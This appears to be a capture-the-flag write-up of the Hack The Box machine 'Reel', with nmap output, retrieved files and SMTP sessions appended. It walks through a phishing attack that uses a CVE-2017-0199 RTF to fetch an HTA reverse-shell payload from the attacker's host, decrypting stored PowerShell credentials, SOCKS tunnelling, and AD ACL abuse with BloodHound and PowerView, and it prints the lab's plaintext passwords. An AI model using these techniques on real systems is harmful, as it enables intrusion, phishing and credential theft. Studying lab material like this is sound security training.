PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18 11:19PM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| TerminalServerCookie:
| 220 Mail Service ready
|_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB)
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49159/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.94%I=7%D=1/16%Time=65A61895%P=x86_64-pc-linux-gnu%r(NULL
SF:,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Mail\x20S
SF:ervice\x20ready\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\r\n")%
SF:r(Help,54,"220\x20Mail\x20Service\x20ready\r\n211\x20DATA\x20HELO\x20EH
SF:LO\x20MAIL\x20NOOP\x20QUIT\x20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n"
SF:)%r(GenericLines,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20s
SF:equence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r
SF:\n")%r(GetRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20
SF:sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\
SF:r\n")%r(HTTPOptions,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x
SF:20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n")%r(RTSPRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad
SF:\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comma
SF:nds\r\n")%r(RPCCheck,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSVer
SF:sionBindReqTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSStatusReq
SF:uestTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SSLSessionReq,18,"2
SF:20\x20Mail\x20Service\x20ready\r\n")%r(TerminalServerCookie,36,"220\x20
SF:Mail\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\
SF:n")%r(TLSSessionReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Kerbero
SF:s,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SMBProgNeg,18,"220\x20Mai
SF:l\x20Service\x20ready\r\n")%r(X11Probe,18,"220\x20Mail\x20Service\x20re
SF:ady\r\n")%r(FourOhFourRequest,54,"220\x20Mail\x20Service\x20ready\r\n50
SF:3\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\
SF:x20commands\r\n")%r(LPDString,18,"220\x20Mail\x20Service\x20ready\r\n")
SF:%r(LDAPSearchReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(LDAPBindRe
SF:q,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SIPOptions,162,"220\x20Ma
SF:il\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n5
SF:03\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of
SF:\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\
SF:x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comman
SF:ds\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequenc
SF:e\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\
SF:x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x2
SF:0commands\r\n");
Service Info: Host: REEL; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-01-16T05:51:02
|_ start_date: 2024-01-16T05:41:44
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb-os-discovery:
| OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: REEL
| NetBIOS computer name: REEL\x00
| Domain name: HTB.LOCAL
| Forest name: HTB.LOCAL
| FQDN: REEL.HTB.LOCAL
|_ System time: 2024-01-16T05:50:58+00:00
|_clock-skew: mean: -4s, deviation: 0s, median: -5s
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 234.68 seconds
Looking at the results
Windows Server 2012 R2 Standard 9600
FTP is enabled and allows anonymous auth
SSH is enabled (haven't seen that on a windows box before)
SMB is enabled
We have both the domain name HTB.LOCAL and Computer name REEL we will add this to our /etc/hosts file
SMPT possibly enabled will check this out
RPC
NetBIOS
Lets start with FTP
we find the directory documents and we have 3 files
after downloading the files, I noticed i had problems trying to Download the "Windows Event Forwarding.docx" file but switching to binary in ftp fixed the problem
readme.txt
short message, possible hint of what kind of documents we can read
Maybe we have to construct some sort of Phishing email?
More specifically what is RTF?
The Rick Text File format, these type of files are essentially text file, but have the capability of storing extra information such as font style, formatting, images, etc
AppLocker.docx
Short message, but could be handy to know when we get code execution
Windows Event Forwarding.docx
longer list
checking the meta data
we do find a possible user on the system
SMTP enumeration
Notice in our Nmap scans, we have the following smtp commands enabled
we should be able to confirm if our email we have found
nico@megabank.com is found on the smtp server
we have now confirmed nico@megabank.com is on the smtp server, okay so what now?
Alright, we have
an email address within the smtp server
a readme.txt please email me any rtf format procedures - I'll review and convert. someone is expecting emails to be sent to them
using searchsploit we do find something interesting CVE-2017-0199 given the machine was created in 2018 this is the most likey intended foothold
To exploit CVE-2017-0199, we need to get a user within the system to open our malicious RTF file, which in turn make a http request for a HTA file, We want that HTA file to execute a revers -shell on the target machine
lets walk through the steps
We want to generate a malicous HTA file that will execute on the system giving us a reverse -shell
now we can create a malicous RTF file using the git repo above using the following options
-M gen: generate document
-w whatAreYouWaiting4.rtf: output file name
-u http://10.10.16.3/pickmeup.hta: url to pick up payload
-t rtf: create a rtf file
-x 0: diable rtf obfuscation
sett up a netcat listener
start a python server with our payload residing in it
Now we just need to send the email
-f: from address, will send from the same domain to be safe
-t: to address. nico@megabank.com
-u: subject
-m:body
-a: attachment
-s: smtp server
-v:verbose
after waiting say 20 seconds we have a shell on the system
Priv Esc via nico
Looking through nico's desktop we can see an interesting file cred.xml
we can see we have a serialized XML representation of a PSCredntial objectt for the user tom
we need to decrypt the secure password and to do so we can
Lets break down this one-liner
powershell -c: telling PowerShell to execute in command mode
$cred = Import-CliXml -Path cred.xml: we are importing the cred.xml and assigning it to the variable $cred , the Import-CliXml cmdlet is used to deserialize the XML content into a PowerShell object, in this case Our PSCredential object
$cred.GetNetworkCredential() | Format-List *": we then call the GetNetworkCredential() method on the $cred object, The GetNetworkCredential() method is typically used with a PSCredential object to retrieve the network credential information. The output of the GetNetworkCredential() is then formatted using Format-List *" which will display all the properties of the object in a list format
we are now left with a clear text password
we did see SSH during our enumeration maybe we can SSH in as tom
it works
Priv Esc via Tom
we do find some interesting file within Tom's desktop
note.txt
Within C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors
we find the file acls.csv lets use scp and copy the file onto our local host
Im not a massive fan of this lay out in a csv file, there's gotta be a better way to view this data
Lets perform some dynamic port forwarding and see if we can get bloodhound-python to enumerate the system
establishing the dynamic port forwarding, for this we will use plink
-sh: Specifies that the connection should use the SSH protocol
tom@10.129.34.39: pass through the SSH credentials for tom
-P 22: Specifies the port number (22) on the SSH server to connect to. The default SSH port is 22
-D 9000: Specifies dynamic port forwarding on the local machine. This sets up a SOCKS proxy on port 9000 on the local machine.
-pw "1ts-mag1c\!\!\!": Specifies the password (1ts-mag1c!!) for the SSH user.
Next we need to configure our proxychains.conf file
we should be able to run bloodhound-python through our SOCKS proxy and connect to the ports that are running internally
proxychains: This command to proxy the traffic generated by bloodhound-python through a SOCKS proxy.
bloodhound-python: This is the BloodHound Python tool, which is used for Active Directory (AD) enumeration and analysis.
-u tom: Specifies the username (tom) for authenticating to the target Active Directory.
-p '1ts-mag1c!!!': Specifies the password (1ts-mag1c!!!) for the specified username.
-ns 10.129.34.39: Specifies the IP address of the domain controller or Active Directory server.
-d htb.local: Specifies the domain name (htb.local) of the Active Directory environment.
-c all: Specifies that all collection methods should be used.
--dns-tcp: Specifies the use of TCP for DNS queries. This can be useful when DNS over UDP is restricted or blocked.
Now that bloodhound-python has ran successfully, we can ingest the data
start neo4j
log in
start up bloodhound
we can mark our user TOM@HTB.LOCAL as owned, if we look at toms "First Degree Object Control" we can see the following
We can see we have "Write Owner" permission over CLAIRE@HTB.LOCAL , and CLAIRE@HTB.LOCAL has "GenericWrite" permission the BACKUP_ADMINS group, meaning we can add members to the group.
Alright we need to own the user account claire
Lets load in PowerView.ps1 onto the system
start a python server on our local machine
Next we need to set tom as the owner of claires ACL
we can now give tom the permission to change passwords of claires ACL
Now we can create a $cred credential variable, and change claires password
Now we should be able to SSH into claires account
we are in
Alright Lets add claire into the BACKUP_ADMINS
we can use the net command
Lets check who is in the group now
Now that claire is part of the BACKUP_ADMINS
Had to log out and back in for the changes to take effect, weird right?
lets check the permissions on the Administrators directory
while trying to read the root.txt flag we get a big fat access denied
but we do find a directory full of backup scripts, looking through the scripts we do come across a possible administrator's password
please email me any rtf format procedures - I'll review and convert.
new format / converted documents will be saved here.
AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.
# get winrm config
winrm get winrm/config
# gpo config
O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)(A;;0x1;;;NS) // add to GPO
Server=http://WEF.HTB.LOCAL:5985/wsman/SubscriptionManager/WEC,Refresh=60 // add to GPO (60 seconds)
on source computer: gpupdate /force
# prereqs
start Windows Remote Management service on source computer
add builtin\network service account to "Event Log Readers" group on collector server
# list subscriptions / export
C:\Windows\system32>wecutil es > subs.txt
# check subscription status
C:\Windows\system32>wecutil gr "Account Currently Disabled"
Subscription: Account Currently Disabled
RunTimeStatus: Active
LastError: 0
EventSources:
LAPTOP12.HTB.LOCAL
RunTimeStatus: Active
LastError: 0
LastHeartbeatTime: 2017-07-11T13:27:00.920
# change pre-rendering setting in multiple subscriptions
for /F "tokens=*" %i in (subs.txt) DO wecutil ss "%i" /cf:Events
# export subscriptions to xml
for /F "tokens=*" %i in (subs.txt) DO wecutil gs "%i" /f:xml >> "%i.xml"
# import subscriptions from xml
wecutil cs "Event Log Service Shutdown.xml"
wecutil cs "Event Log was cleared.xml"
# if get error "The locale specific resource for the desired message is not present", change subscriptions to Event format (won't do any hard running command even if they already are in this format)
1.
for /F "tokens=*" %i in (subs.txt) DO wecutil ss "%i" /cf:Events
2.
Under Windows Regional Settings, on the Formats tab, change the format to "English (United States)"
# check subscriptions are being created on the source computer
Event Log: /Applications and Services Logs/Microsoft/Windows/Eventlog-ForwardingPlugin/Operational
#### troubleshooting WEF
collector server -> subscription name -> runtime status
gpupdate /force (force checkin, get subscriptions)
check Microsoft/Windows/Eventlog-ForwardingPlugin/Operational for errors
exiftool Windows\ Event\ Forwarding.docx
nico@megabank.com
telnet 10.129.34.39 25
Trying 10.129.34.39...
Connected to 10.129.34.39.
Escape character is '^]'.
220 Mail Service ready
HELO shrek123@shrek123
250 Hello.
MAIL FROM: <shrek123@shrek123
550 Invalid syntax. Syntax should be MAIL FROM:<mailbox@domain>[crlf]
Mail FROM: <shrek123@shrek123>
250 OK
RCPT TO: <nico@megabank.com>
250 OK
sendEmail -f shrek123@megabank.com -t nico@megabank.com -u "Are you going to read me???" -m "So you did read me mwah ha ha" -a whatAreYouWaiting4.rtf -s 10.129.34.39 -v
Findings:
Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).
Maybe we should re-run Cypher query against other groups we've created.
